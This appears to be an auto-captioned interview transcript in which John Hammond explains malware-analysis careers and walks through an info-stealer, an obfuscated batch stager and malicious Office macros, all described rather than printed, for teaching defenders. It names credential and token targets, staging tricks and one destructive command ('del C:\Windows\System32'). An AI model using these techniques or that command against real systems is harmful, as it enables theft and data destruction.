MALWARE ANALYSIS // How to get started with John Hammond

Captions
What phone numbers can it track down, what email addresses or IP addresses, credit card information, Bitcoin addresses, street address. It's trying to get everything. Yeah, very scary, right? But, and this might look like a lot of code, I know regular expressions can be kind of hard to read, but I want to at least surface this idea to you: they might do some pretty sketchy stuff.

[Music]

Hey everyone, it's David Bombal, back with John. John's going to show us some really interesting stuff today. I don't want to spoil it, John, so you take it away.

Hey there David, thanks again for letting me come be here with you. I'm super excited about this one.

That's great to have you here. So what are you going to show us?

Well, hey, in the last couple of videos I think we were chatting about capture the flag (yep), which is an awesome vehicle and vessel to learn and get started within cyber security, maybe kickstart your career if you're interested in that. But I think some folks divide in their mind what you can do with this, whether it's just strictly, okay, red team, pen testing, adversarial emulation, threat emulation, or blue team, defense, and strictly that, maybe manning a SOC or a security operations center. There's so much out there. One thing that I tend to do for my day job personally is kind of working as a malware analyst, so understanding how the hackers and how the bad guys and the attackers get onto your computer, get on the target system, and how do they stay there, how do they remain undetected, what are their persistent footholds or the implants or the back door that they use to continue their operations. So I think we can maybe have a cool conversation about some malware analysis and some stuff I'd like to showcase there.

Yeah, I mean, you were telling me previously, I mean, you're well known in the industry for CTFs. I mean, you do a great job going through CTFs, but in your day job you actually do malware analysis, is that right?

It is, yes.

So let's see, let's explain from, sorry, I didn't want to interrupt, from the very beginning: what is that, actually?

Yeah, so there are a lot of, honestly, different ways you could go about it. Some folks, and maybe I'll get some flack for this, some folks are strictly in a compiled computer program or the binary itself, so they'll open it up in tools like Ghidra or IDA Pro or other debuggers and disassemblers, and they'll kind of comb through the weeds, really looking at the assembly instructions or the computer opcodes that make that program do what it does. And that's tough, I'm not going to lie, like that's hardcore work, kind of looking through assembly opcodes and understanding how that machine language is worked through. Truthfully, and I'll be honest, I don't do that as much. I'm not too sharp in that world and I certainly need to get smarter. But the way I see most often how hackers kind of maintain their persistence and slide under the radar, because they have to combat against anti-virus programs and EDR and all the other defensive mechanisms we put in place, so they have to get crafty and pretty clever: they might use obfuscation, hiding their code, or they might use living-off-the-land techniques, even if it's just using a simple scripting language where the code is readable by us humans but it's mangled and transformed and presented in a different way that can be really hard to understand. So having the human context, like us as security folks actually taking a look at it, that's what's super important, because we might see what the computer, the automated solution, might miss.

That's interesting. So I mean, there's all this talk about AI and stuff, but you're saying that there's still a very important role that humans take in this stuff?

I would say so. I haven't drunk the Kool-Aid on artificial intelligence and machine learning just yet. Don't get me wrong, there is absolutely a need for that. It's certainly imperative to have automation and some of that tooling in your security stack, but having that parachute, having that last escape plan here: don't forget to let a real security person kind of look through it with their own eyeballs. They'll have the context and understanding, then maybe they'll find something else, and that's how you get threat intelligence, that's how you determine indicators of compromise, that's how you understand what's shaking up the security landscape.

So tell me, I mean, this is a question I'm sure a lot of people are going to be thinking about: how do I get to where you are? Sorry, I always ask this question. So is there a path that you would recommend, or what do I need to study? Are they certs? Are they CTFs? How do I get to where you are if I want to do malware analysis?

For sure. I always go back to it, but man, I really think those capture the flag challenges, they'll give you the exposure, they'll get you so familiar with other languages and the technology you might see. Maybe more specifically, Windows, right? And maybe you'll have more exposure to that in a network administrator role or a sysadmin role, a system administrator role, because you're going to get used to being in the command line or scripting with PowerShell or batch, and we see a lot of PowerShell, like a lot, a lot of PowerShell. Those are certainly important. And I'm not positive, maybe you might tell me a little bit more, David, some other Microsoft or some other certifications that will really help fill those gaps. But you just get smart on this by playing with it, by experimenting. When I try to showcase malware analysis videos on my channel it's different from a capture the flag, because in a CTF there's an objective goal, but for this sort of work in malware analysis it's very exploratory. We're just kind of bumping around in the dark and trying to shine the light on as much as we can.

So I mean, in your day-to-day job, what do you... it sounds
like most malware is on Windows systems, and that's perhaps because Windows is so dominant in the enterprise. Is that kind of right? Is it that you see mainly Windows stuff?

It is, truthfully. So I have to say this with a little asterisk and disclaimer here: for what I do for my day job, we focus solely right now on Windows machines, Windows targets and Windows victims. We're in the works for rolling out a Mac agent, but hey, I don't mean to turn this into a commercial. There is absolutely more malware and viruses and RATs and trojans on Windows, as you mentioned, because it dominates the market space, it's all over the industry. But that's not to say there aren't any on Linux or Mac; it's just a different form, a different variation, and not as prolific as all the folks running Windows.

Yeah, but it's interesting. I mean, it's funny, when I talk to you and I talk to other people it always comes back to the same conversation: do CTFs, go to, you know, Hack The Box or TryHackMe or something and spend time doing a whole bunch of CTFs. And I just want to plug you, because it's important: if you want to see someone who knows what they're talking about doing CTFs, go to John's channel, because he's got lots and lots of videos. You must have like 100 videos or more just showing CTFs, is that right?

Yes, I think I have over a thousand on my channel, but maybe not strictly capture the flag. I am very flattered and I super appreciate all the kind words. I do have to say, hey, there are tons of people much smarter than me. I wouldn't be able to compete in like a DEF CON CTF or do that low-level binary exploitation. There are some real geniuses way, way more ahead of me, but I want to make it approachable, I want to make it friendly, and I want to make it something that anyone can explore and play with and learn from.

And I mean, that's important, especially when you're starting out, because when you're starting out you're not quite sure. So picoCTF, we mentioned previously, I've got a previous video on my channel where John talked about that. John, I hope I can twist you at some time to do, you know, Hack The Box or TryHackMe examples, but otherwise just have a look at John's channel, he's got a huge amount of content there. So John, that's great. What about a practical demonstration? Is there an example, like perhaps SolarWinds or something, that you can show us? We mentioned that.

Absolutely, yeah. So I have a ton that I can showcase. I think what would be cool to do is, if I can kind of get your feet wet, if I can get your ability to know what some... and then maybe in a second video, or however you'd like to organize it, we can dive into a little bit of SolarWinds.

That'd be great, yeah. Let's... because otherwise I'm going to jump too far. Give us a baby step. So like, I assume that I, and a lot of people watching, have zero knowledge of this, so take us down the path.

For sure. I will go ahead and share my screen. Okay, so here I am doing a little screen sharing, just to showcase kind of what we can get into for a little practical demonstration. And I want to set the stage here. So I am running Windows 10 on my host computer. I use Linux, I'm using Ubuntu, in my virtual machine. You'll notice it has a little Kali background, but that's just for the clickbait; I am running Ubuntu here. And I have this virtual machine set up with a little communication for my host machine, or some other network share. So, because I use so many laptops, because I use this as my desktop computer, I'll set up a network share for some of the files that are kind of important to me to access. Now you'll notice one of the fun ones in here is a malware folder. I keep track of my notes from things that I'm learning, I keep track of capture the flags that I play or other certifications that I'm studying. We talked a lot about it before: yeah, hey, build out your catalog, build out your library. And it's funny, now I've been collecting and building up a repertoire of even malware to look at, whether it's for content, whether it's for stuff to showcase on YouTube, or it's just for learning and exploring what techniques and tradecraft some threat actors might be using. So we'll dive into this folder and I want to show you some of these cool ones, just to again get your feet wet. I try to organize them by maybe the language that I know the thing is going to be written in, or uncategorized. So we'll have a few samples, and this is a growing list in some of those other designated folders, but the miscellaneous one is getting larger and larger as more people send things to me, as I see more things kind of going through what I do. And it's cool, it's weird, it's like a little garden that we water and flower to get exposure to new things.

That's great. Yeah, definitely looking forward to that SolarWinds one, and we'll do that, like you say, after we've got our feet wet.

Yeah, so I think I'll start by showcasing some Python one, just because I know we discussed a little bit of Python in the previous picoCTF video. Yeah, so I'll show you one script that is originally written very human readable, because the malware author, the bad guy, whatever person who put this together, had to write it. They had to write the code, and being Python, you'll know, hey, this isn't strictly already installed on Windows computers or the target, but it can certainly be compiled or compressed down, and you'll see a lot of other variations, whether it is in batch or Visual Basic Script or PowerShell or C# or a compiled binary, etc. So let me take a look at this code, and let's actually open it in my virtual machine, so I'm not, you know, testing the water.

[Laughter]

You don't want to run that.

Yeah, okay. I realize that's a little bit wonky, but I'm going to take a look at this main working, no obfuscation script, just to get an idea as to what this looks like. Now this might be spooky,
this might be kind of scary for folks taking a look at it, but if you're familiar with the Python language this should be readable. Python is meant to be very easy to read and easy to write. But you'll see functions defined in here to get credentials, and it might look in your local application data folder that's kind of configured on Windows computers. It'll keep track of the locations for Google Chrome or Opera browser or the Edge browser, Brave browser, etc., and it might try and track down if it can find a local database of cached information like your passwords or what your usernames might be. This is something similar to what I've showcased in a Discord token stealer or a Slack token stealer, or they might try to find your access token for your account, and that will bypass two-factor authentication or multi-factor authentication all on its own if they could get their hands on your user's token. And that's stored, of course, if you save it and cache it on your computer. So they might use regular expressions to track that down, and they'll keep track of all this. There are tons and tons of this. This malware builds out, hey, trying to find download history, and I'll cruise through here, or browser history, PII put together in regular expressions: what phone numbers can it track down, what email addresses or IP addresses, credit card information, Bitcoin addresses, street address. It's trying to get everything.

Yeah, very scary, right?

But, and this might look like a lot of code, I know regular expressions can be kind of hard to read, but I want to at least surface this idea to you: they might do some pretty sketchy stuff. And this code goes on and on. Over on the right-hand side you can see the map of what Sublime Text might be looking at in here, and it will track down your IP address, it'll try to see if you have a webcam attached, can it take a screenshot, will it look for your computer info, what CPU are you using, maybe that could be used for deploying a cryptocurrency miner like LemonDuck or lots of other variants, etc., etc.

Okay, it's grabbing a bunch of stuff and then I'm assuming it's going to do something with that. Is that wrong?

Yeah, I think this one specifically is just for exfiltration. It is going to try and grab those Discord tokens, it is going to try and grab that other information, like accounts and passwords. Keep in mind, even doing this, if it's not going to, okay, explicitly detonate and deploy ransomware or turn a computer into a member of a botnet or deface a website, even getting this information, that still means money for the bad guys, because they could sell this out in the corners and crevices of the internet, right, the dark web, quote-unquote.

Yeah, I see at the bottom, it looks like you've commented it out. It looks like it's going to an anonfiles.com website or something.

Yeah, going and trying to upload things so that it's all accessible for the bad guys, maybe keeping track of these.

Yeah, so it looks, I mean, I haven't looked at the code very well, but it looks like it's trying to grab a bunch of stuff, and then if you ran this it would push it to a website or something.

Yeah, yes. Now I bring this up and I show this to you because some of you might say, like, well John, this is just totally in the clear, like this is very obvious what it's doing, you can just read it in the source code. And you're absolutely right.

Yeah, because I mean, if you try and run... I've had a lot of people complain about this. I wrote a simple Python keylogger, and as soon as you run that, Windows just deletes the file because it sees it as malware.

Yeah, right, right. Yeah, anti-virus, that's always a formidable foe. Windows Defender is certainly getting pretty smart.

Yeah. So I mean, are you going to show us now how the bad guys, for lack of a better word, would take something like this and then try and hide that?

Yeah, yes. So there was one other file in this folder that I wanted to showcase. They have an obfuscated rendition, where if we take a look at this it is completely unintelligible, like there's no understanding of what the heck is going on. This is a very extreme example, like this would certainly take me a hard time to understand what's happening. They've replaced every variable, every function name, every string, with underscores or some weird mathematical way to kind of compute it, and look at that sidebar: there's no way to make sense of what this is doing. Again, super extreme example, but I want to show you that idea of obfuscation. That just means making code, that means making the badness, transformed or encoded or encrypted in a different way so that the computer and the human being might have a hard time understanding what the heck this thing's doing.

So in your experience, do you find that most of it looks like this kind of craziness, or is it clear text, or is it just a mishmash of all kinds of things?

So it is super variable. Oftentimes, if a hacker is on a computer system, if a threat actor is kind of working their way in, they never want to touch disk or have remnants on the file system, because then they leave themselves vulnerable, or kind of they leave themselves subject to that anti-virus software stepping in or that EDR automated solution. When they touch disk, then they have a footprint, then they have an artifact, and they've left their fingerprints there. So oftentimes what they do end up dropping on the file system, if they do, is a very obfuscated little stub, or kind of a stage one payload, that might extract or pull out or maybe download a secondary stub or another payload, and maybe that'll be obfuscated or encoded in some way, and it'll work through layers and layers of different stages, maybe going up to three or four or five or six different bundled layers of the onion to really find the final payload. And that final
payload might be obfuscated, or it might be in the clear, kind of just as we saw a moment ago. I'll show you a few other examples of this if that's totally cool.

Of course. The question is, John, how on earth do you find this stuff?

Yeah, so how do folks... and I have a lot of questions like, hey, how can I find samples like this? Truthfully, if you want to look around, there are a lot of online resources. vx-underground is well known. theZoo is a GitHub repository that is, again, well known. MalwareBazaar, I think it's abuse.ch or something, I could track down a link and send it along.

Yeah, that'd be great.

The MalwareBazaar is actually excellent, because they'll let you download samples and they'll let you tinker and explore. And you'll find tons of online sites, like, I don't know, I'm not sure if Joe Sandbox or ANY.RUN will let you download a sample, off the top of my head.

VirusTotal?

Sorry, go on. VirusTotal, if you know the hash of something, and if you pay for the paid tier, which costs an arm and a leg, but some organizations and companies might be able to latch onto that, they'll let you download as well. And that's what's... studying.

Yeah, sorry, go on, I keep...

No, I realize I'm long-winded.

No, no, I like it.

You might also just get a weird random text message, or you might get a totally arbitrary email that's just an advertisement that links to some weird sketchy site. Those are always fun to dive into as well. I've started this little game: whenever my friends in the real world get one of those weird spam text messages or emails, they just send it along to me, because, like, hey, that'll be fun to look through.

So I mean, that's interesting. So for studies, I'm glad you mentioned that. So for study purposes there's a bunch of websites, which are linked below, where people can go to. But be warned, I suppose we have to say, be warned, this is like stuff that you don't want to mess around with, so be careful. But how do you find the stuff in the real world? Is it like the antivirus picks it up, or does a company phone you, or do you have software on companies' computers? I mean, feel free to talk about the company you work for. So is it like software that's installed that picks this up and warns you that there's something weird? Or, I mean, how did you get to that file?

Yes, so the example that I showcased just now was a community-submitted one, some viewer and audience member sent it along. The way that this sort of got started, and this kind of gained momentum on my YouTube channel, was me wanting to tie it closer to what I do for my day job, for my real work. Now I work at a company called Huntress, and Huntress is a managed threat detection company, with software as a service or an agent that you install and deploy on your machine, and you can deploy it across as many machines as you want to get the most visibility and coverage. And it is that backup parachute. It's going to look and hunt in those known directories or locations on a computer's file system where hackers will leave their back door or that implant, where they get their hooks and claws sunk in there. Those are oftentimes simple startup programs, the same way, hey, your computer maybe might turn on in the morning and Skype will automatically open so you can work with your co-workers, or Slack or Teams or whatever you tend to use to communicate. That has to know how to do that, so there's a location in Windows, and maybe even in the registry, or some WMI event consumers or services, scheduled tasks, anything that can automatically, without user interaction, pop up. That's where the hackers are going to hide. So even the Microsoft utility from Sysinternals, that Autoruns tool, will show you all of these. Our agent is Autoruns en masse, deployed across an entire enterprise. So that's how we hunt and do this threat analysis.

So I mean, that agent will alert you, it looks like there's some dodgy code on the computer, and then you'll investigate that. Is that hard? The sort of... I'm just trying to work out the logic in the real world. How do you... assume one of the samples you got was a real-world sample. How do you actually end up getting to look at that code?

Yes, it does require, truthfully, your own intervention. It does require your own effort and initiative, to, like, let me go look, let me go make sure there's no weird code, like a randomly named file with a Visual Basic Script or a .bat or PowerShell extension, just to look, just to see.

So your software will alert you to that, or do you spend time going around looking at computers, or just a combination of both?

Yeah, combination of both, really. It is a synthesis, and again, I don't mean to make this an advertisement for my children...

It doesn't matter. I mean, this is about real world, so let's use your company as a real-world example. So feel free to talk about it, talk about what you do, because at the end of the day everyone watching this wants to become like you, as in, perhaps they want to get a job in a company like that. So this is going to be a long series, John, I think, because the next question I'm going to ask you is how do I get a job? So, like, start with CTFs, that kind of thing. And I'm jumping around now, so go for it: explain what you do, and then we can come to jobs, and then look at more code.

Sure thing. So I mentioned it is a synthesis, and I mentioned earlier that automation is absolutely necessary. It is still imperative, but it's not the end-all be-all. So yes, we do get alerted kind of automatically. We have some triggers and flags set up for finding and seeing badness like this. We'll write detectors, or something like, hey, if the persistence mechanism, if the file name, if the command line arguments, if they match this sort of pattern or this sort of tradecraft, the certain schema that a hacker might use and what they
deploy and maybe mass spam across the internet, we'll use detectors to detect those faster. Then of course we do hunt, where we're actively looking, we're just spot checking as many machines as we can, and we kind of have it set up as a little queue, like here is a humongous pile or a bucket of autoruns, of persistence mechanisms, of new code or new files or new samples that we've never seen before. And they might be benign, they might be totally innocent, or they might, hey, maybe be some cause for concern. So it just takes the human action. It just takes you taking a look at it, like literally looking with your eyes and just not blindly trusting the dashboard or the SIEM solution to trigger on it. Because we whine and complain about false positives, yeah, but the false negatives are much more dangerous, when there's evil and badness there and you're totally unaware, you're blind to it.

Yes. I mean, on a day-to-day... I think we must do a day in the life of John Hammond, that'd be a good one.

It'd be very boring.

No, no, I don't think so. So, like, during the day you would get alerts. Obviously there's, like, I'm assuming there's some kind of team that's checking all the alerts coming in, but you'll also go and look for weird stuff, perhaps on the internet or on your customers' computers, to try and see if you can find something. Is that correct?

Absolutely. We do take input and intel from other sources, right? So when I talked about those anti-virus products like Windows Defender, or XYZ, name your AV tool of choice, that will still tip you off. So you can let preventive security still kind of help augment and help supply for your detection, your detective security. They all kind of go hand in hand. But I think it is still vital and absolutely necessary that you, on your own, keep track of the threat intelligence, keep track of the indicators of compromise, and go hunt and go look.

So John, before I get this thought out of my head, can you tell me, like, okay, I'm interested in becoming like you, I want a job like yours. You've mentioned CTF stuff like that. What kind of skills... let's say you were looking to employ a new person that was doing kind of what you're doing, what kind of things are you looking for? So what should that person do, to put on their resume as an example, to be more likely to get a job doing what you're doing?

Yeah, so there are elements that, I'll say, make me sound like a broken record, because...

No, no, that's fine, that's important.

And there might be some other elements to pour in here in the case of malware analysis, in the case of incident response, in the case of threat intelligence. Yes, you still should study, and you should put it out, and you should document it and give it to the world. Have the website, have the blog, have the GitHub, have the articles, videos and YouTube, etc. Be present, be in the community, talk, etc., go to conferences, more and more and more, everything I've said prior. But for malware analysis it's not strictly playing CTFs and TryHackMe and Hack The Box. Yes, you need those, and they'll supplement, and again it's an iterative process if you need to bounce back to them.

So you would put that on your resume?

Yeah, I would, personally, if it's something that you're proud of. If you're like, hey man, I'm in the top 100 for my country or something, or I'm in the top 10 in the world, like, sweet, hey, yes, sing those praises. For malware analysis, maybe you want a little bit more. Maybe you want to go look at those samples, like on vx-underground, like on the MalwareBazaar. Now I have to caution this with the point that you mentioned earlier: you need to be careful. Yeah, like, I live on the edge. Maybe I'll try and curl down, I'll go see if I can access that weird endpoint or URL that the payload reaches out to, maybe I'll send some traffic that way just to say, hey, what'll it do, I'll poke it with a stick. But make sure that you kind of know what you're doing. Have the proxy, have the VPN, have the virtual machine, have defenses in place, some extensions that make sure you're not falling down a road you shouldn't, make sure your antivirus and host isolation stuff is on. But build out that library, build out that catalog of samples that you've looked through, and stuff that you can showcase, and hey, you've written about, you've produced. So I would encourage that to folks that are wanting to get a little bit more of a job or career in this. Yes, explore and play with it in your free time, and start applying, like there's no shame in that.

I'm going to push you, because that's what I like to do with everyone I interview. So okay, that's great. So let's say I want to get a job now. I go into LinkedIn, I search for... what do I search for? And then what are employers going to be looking for? I mean, you've mentioned, like, put CTFs there. I could say that I've worked with a whole bunch of malware, but are there any, like, trigger words, like certs? Or, you know, how do I get... which jobs do I look for? Do I just say malware analysis? Sorry, this is kind of like a long-winded question, but I'm trying to help someone. Like, if I wanted to practically go and do this tomorrow, how would I do that? What do I search for? What are employers looking for?

So LinkedIn, Indeed, Glassdoor, whatever, any of those sites are an option. If you are looking for malware analysis, you might find that you will look and you'll see a lot that are specifically those compiled binaries, which is true, much more genuine reverse engineering. And a lot of those, truthfully, are going to be a little bit more government or military or defense contractor stuff, I'll be honest, because, hey, that's in high demand there. They kind of want to get ahead in that cyber warfare game, and that's very important, and understanding threats in the security landscape is all part of that. So maybe you
might have some luck hey trying for a security clearance or having a little bit of military background in you that's an option that's one road to go down um but those key words those hot topics uh malware analysis reverse engineering uh obfuscation payload exploit blah blah blah try hackman hack the box are still in the mix without a doubt but certifications i think sans offers one of the grem or gayac reverse engineering malware a lot of this is very forensics oriented too dfir digital forensics and incident response that's all part of the puzzle yeah i mean i'm not i'm if there's no like clear path that's great it's just to try and help someone like i come from a networking background and it's quite obvious you know there's certain stepping stones that you would go through and if you were looking for a certain type of job you'd look for a certain certification like um if i was looking for a job i would what i searched for like oscp or is it just some of the terms that you've used like as an example john how did you get your job was it just because she put your name out there and then someone saw it and or did you have to go searching yeah i i hate that i'm never i i don't have a great example uh because my case is is very strange very odd i'm a lucky unicorn uh a lot of it is having the notoriety the self notoriety um my that that comes from youtube that comes from that comes from youtube yeah but there you go so i mean it's like put your name out there yeah my boss reached out and was like hey john you look like you're doing really cool stuff you want to come party with us uh and i'm like yeah that'd be a ton of fun but it's funny you know it's um i i've interviewed other people and they've kind of said the same thing it's and i'm a firm believer in that when i started putting my name out on social media doors opened i used to try and hide it i mean you're in the security world i mean it's like you know if you can put your name up there then i don't think others 
need to worry about putting their names up there. So, like, was it through YouTube that you got found, is that right?

Honestly, this is really weird. It's a story for my current job, but others, I can explain it if they might... I mean, you're more than welcome to share. Okay, John, off camera, if you don't want to talk about that, that's fine, but I'm going to ask you to share your story if you're okay with it.

Yeah, so I'll go through a couple of different phases here. When I was getting out of college, when I was getting out of my schooling and undergraduate, I was looking for my first job. I was looking for my first thing to get my foot in the door, to see, hey, where am I going to land in the market? And it was an interview and a job that I was applying for, for an instructor role, for teaching and for getting interaction with students and going up and doing the song and dance, talking to PowerPoint. So I came into the interview with a book, like a binder, of: look, hey, here's the textbook that I wrote when I taught a course at my school, because they kind of trusted me with that leadership and explaining and showcasing technical concepts in Linux. Everything that YouTube and everything that being a present community member has trained me for, that's where you can find my value, and I can just show that to them. So they're like, hey, I know you're some green kid, like, fresh out of college, but we totally trust you with this instructor role, because you've proven that, you've shown that. And that was really what I go back to when people ask me, like, how do I get an employer to take a chance on me? Well, hey, show them, like, everything that you've done, and then they'll really value that. So that's GitHub, that's YouTube, that's your articles and your blog.

That's the way... it's really interesting that you say this, because, I mean, the world's changed dramatically, hasn't it? So in other words, what you've
what you're telling me, and I'm kind of pushing you on this, is: you're telling me don't worry as much about certifications per se, spend time getting your name in the community. Like, go on LinkedIn, make connections, create blog articles, whatever, create videos, do something, but get known in the community, because it's who you know that's more important than perhaps always what you know, even though that is really important. Is that kind of like... I don't want to put words in your mouth, but is that kind of correct in what I'm saying?

Yes, I think it totally is. And I think I can piggyback off that for the conversation of my next one, at the job that I'm at currently. This is funny, and I think it ties in well to everything that we're talking about. I knew the CEO, I knew my boss, two or three years ago before I got started with the company, because I saw him on the internet, I saw him across the Twitterverse, and I noticed, like, hey, this guy has a lot of followers, like, this guy's known in the community, he seems like a cool guy. So I literally reached out and, like, cold called him, and I was like, hey... Oh wow. ...I'm doing some, like, YouTube stuff, I try to produce content on videos and cyber security and CTFs, would you mind just, like, sharing my stuff, would you mind retweeting it or something? And it was so weird.

So you literally phoned him?

Yeah, yeah, it was a Twitter message, it was genuinely a tweet. Well, I'd probably go back and find it. But he's like, hey John, like, this stuff is really cool, you're doing some awesome work. And then we have strangely known each other across the internet airwaves for two or three years, and actually we ended up meeting. He showed me the office at the time, because it was a startup kind of getting in motion, over in Maryland in the United States, and we had lunch together. It was cool, it was just like, hey bro, just hanging out. Two years, three years later, he texts me: hey
man, we just got some funding, we're doing some pretty kick-ass stuff, I think you are too, you want to come be on this party? And the rest is history, right? I love that role, I'm very fulfilled with what I'm doing now, but it all comes from being in the community and reaching out and sharing content and knowledge.

Yeah, I mean, I think that's really important to emphasize, and I'm a firm believer in that as well. You know, if I wanted to hire someone, and I mean, you tell me if you agree, let's say you have to hire someone tomorrow: would you hire someone who's just got a bunch of certs, or would you hire someone who you see doing stuff out there? And I think for me personally, you know, you want someone with a certain character. Character is really important. You know, you don't want to just hire based on certs, and if you see what they're doing and they're putting out content, it's far more likely that you're going to pick that person.

Yeah, I think we've had a conversation just like this in kind of our last session, but I would certainly opt for that individual that is prolific in sharing what they're learning and demonstrating that, hey, they're in the grind too, they're wanting to soak up more and more information. Yes, certifications are one piece, but we've also had the conversation: hey, some certifications can be just a brain dump test, it could be rote memorization, you chew it up, spit it out, and that's it. If they're in the mix, if they're in the scene, if they're known in the community and they're producing stuff, I really like to see that. It shows drive and determination, and it also can show me what they know and what they can demonstrate and what their merit and competency really is. That's what I'd go for personally.

That's fantastic. Okay, John, come show us something else that's interesting. Let's see, have you got another good example?

Sure thing, I can try and whet our appetite
again here. So I'm back in that shared network share, from my malware folder. I have these kind of used and unused folders where I differentiate what I've already looked through or what I've produced a video on, etc. So I'll get back into our unused pile, and I've showcased that there are a lot of different languages that this might come in. By no means is this all encompassing. Like, sure, we've got C# in there, also compiled stuff, C++, there's Java, it goes on and on and on. I showcased just a tiny Python example to kind of get the idea across for obfuscation, but I want to present that in a different way now. Let's move into that batch directory and take a look at one that is obfuscated. I guess this file's named spooky, so I will open this up in a text editor.

I don't know if folks are familiar with the Windows batch script, but that's that command prompt, that's that big black box, right, where you can type in commands and have finer control over what your computer is doing. But you can script that, you can automate some of those commands that it might be running. So again, maybe you look at this and, hey, this makes complete sense, you're right, or it doesn't. And this is where those bad guys are going to use clever tricks, where they're going to have something up their sleeve, where they understand how the language, how the computer, like the scripting language itself, will be interpreted and read. Sure, it'll clear the screen, that one's known to us. It'll turn off the display of commands, use some delayed variable expansion extension, and it will set a lot of variables. set is kind of the syntax and keyword to define a variable in batch here, but you'll notice that this variable is set to nothing. So they might just use this whole random weird string to, I don't know, get in the way of other things. They'll loop through some stuff with randomness in the mix, dividing things, and then they'll start to define different chunks
of some weird variable name being simply set to letters of the alphabet, so later on in the code they can go ahead and put this together and build out a payload one character at a time, with randomness all throughout it. So the final payload might make no sense, it might be completely intelligible, but you might be able to see fragments of, oh, a ProgramData or a path in here, and, oh, I see some extensions of dump files or .exe and .zip files that might be kind of referred to eventually. And then we start to break up, looks like a URL, http, https, going to some weird Amazon S3 bucket where they're reaching for an image file. Kind of strange. But then they'll invoke PowerShell where they'll hide the window. Let me turn on word wrap here, and we have this chunk of inline PowerShell code, and we might need to start to figure out, okay, how does that do what it does?

I will go ahead and put this into a PowerShell thing. So some videos that you might see on my channel are either me trying to understand what code might be doing through, like, a beautifier, some online tool or some utility that might be able to display this code in a little bit more readable sense, or I might go through it manually to try and understand what's happening where, and just make this more readable and understandable for me. Some of these variable names that are being pulled in came from that script previously, and if we end up downloading something like that strange .png file, what if that's not really an image file? What if they pull it down and it turns out it's just going to be more PowerShell code that's evaluated and executed on the fly? So I realize, yeah, there are still some weird variables in here and it's still hard to read, but this is certainly much easier to look at than this, in my opinion.

Oh yeah, oh definitely.

So again, that's really kind of what I wanted to offer and showcase here. I don't need to go through a ton of this for this video; if you're interested in that, check out some of the stuff on my channel. But
these techniques of hiding things within variables... Sometimes threat actors have even hidden the set command itself. I think that was a well-known trick in TrickBot, right, one of the other larger malware families. Between TrickBot and Emotet, TrickBot has certainly done some other clever stuff with the language here in batch to hide that stager or that initial payload.

How many languages do you know? I mean, I remember you said Python was like your core one, is that right?

Yeah, again, I wouldn't say that I'm fluent in much anything other than Python, but you can interpret what you're seeing there. Yeah, absolutely, you'll get familiar, you'll pick up the syntax. At the end of the day a lot of it is the same concepts, right, the programming concepts of logic, variables, functions and flow. Those are really what you'll get exposed to.

But John, tell me, is it by osmosis that you learn this stuff, or is it just, like, through CTFs you kind of just get a feel for, you know, what's good, what's bad code? Is it like bad code is, like, weirdness, whereas normal code wouldn't look like that? So I mean, if I was looking at something on a computer, how on earth would I know if it's good or bad?

You're totally right, that is a hard call to make, because some languages, like, okay, maybe JavaScript is a fine example, they'll minify or compress and pack the code just so it's smaller, just so it can run faster and be optimized and efficient. So maybe the randomness that you see isn't a definitive, like, litmus test for what's good or bad. If you find some telltales of known dangerous functions, like eval or execute or, I don't know, Invoke-Expression, Assembly.Load, Add-Type, etc., those will have some other side effects of just executing code on the fly that can be bad. I might be able to pivot to another more real world and tangible example of that, if that's okay to discuss.

Sweet. Okay, I wanted to showcase maybe something a little
bit more real world, or maybe something a little bit more tangible to some folks, because we talk all the time about, like, Office macros, or you get an email attachment, oh, it's a weird Word document or it's a weird Excel file. So I'll showcase this one that was sent along. It is an .xlsm file, or an Excel file, and there's another one, .doc. So you could open this up in Microsoft Word or Microsoft Excel and you'll get those pop-ups like, hey, content has been temporarily disabled for security, do you want to enable content? Yes, yes, yes, yes, yes, a thousand percent. Well, the moment you do that, the moment you click on, yeah, totally, let's run this thing, let these security macros go, there are functions and hooks set up to do damaging stuff, depending on what it is. Maybe it could be totally innocent, but you'll have to look. Yes, you can look in Microsoft Word, in Microsoft Excel and Office, but hey, you're kind of rolling the dice and gambling a little bit there.

Again, I'm in Linux right now, so I'll use a tool, I think it's olevba, and that way we can kind of take a look at what is inside these files. I mention this because olevba actually does a really good job of giving you kind of a description of what it found and what's weird in here. Ooh, we saw the Run syntax, and maybe that means it'll run some other program or, like, a command like del C:\Windows\System32 to delete everything, or maybe it'll load in a library or download files. It's encoding stuff with hexadecimal or Base64. Base64, a good tie-in, as we talked about in picoCTF. Yeah, and if we scroll up here, if we take a look more through what olevba kind of displayed for us, we can see the real syntax, we can see everything that's defined in these macros without opening it and kind of living on the edge there in Microsoft Office. So I will bring that into an editor so it's a little bit easier to read. I don't know if there is a good syntax for it. Decent. This one's really interesting, because it will pull in
functionality and code from, like, the Windows API. So the urlmon.dll, or that library that exists on your computers, has other functions that languages like Visual Basic Script or JScript or PowerShell and C# can hook into and latch onto. So this will pull in that URLDownloadToFile function, and we'll start to see some weird syntax defining functions, maybe pulling some data out of actual cells, maybe defining that Excel document or starting to prepare a download. Again, I see this next orders function, it'll take in an argument where it's trying to be stealthy, it's trying to hide. It breaks up that https schema, and then we could explore this more and more and more. We could try and make sense of these random function names, but time bars and v mall, well, hey, again, those are just things to look innocent, so an automated tool might not be able to see the evil in this. But this one I don't think actually has the auto open call. Let me showcase the other one. This is the example here, right: when you open and click on that enable content, to enable editing, the AutoExec, Document_Open will just totally kickstart and evaluate and run that code. Well, so that's a neat tool, and you can pull out all of the strange code that they might be burying in that macro.

That's great. I know it looks like a lot of noise, but it's fun to explore and try and make sense of.

Yeah, so let me ask you some more questions, John. Do you think it's a great career for someone to get into? Is there a lot, are there a lot of jobs? And I'm assuming the answer is yes.

Yes, in my opinion it's fulfilling, it's a ton of fun. It's really cool to see real world stuff, especially when you have those spooky, scary conversations about, oh, Microsoft Exchange got hacked, the sky is falling, SolarWinds got hacked, oh my goodness, what is the security industry going to do? Hey, those threat intelligence researchers, those malware analysts, we're the best line of defense, because we can educate the
community, we can look for those indicators of compromise, and that's in high demand, right? How does the world respond to, like, fires like this, dumpster fires, when something new got popped? There's a Chrome zero day or whatever, what is going on, how can we make sense of it? So I absolutely think, yeah, it's certainly a great job, and there's definitely a demand for it.

And do you work normal working hours, or is it like when something blows up, like the SolarWinds thing, now it's all hands on deck and you have to work like 24/7 type thing?

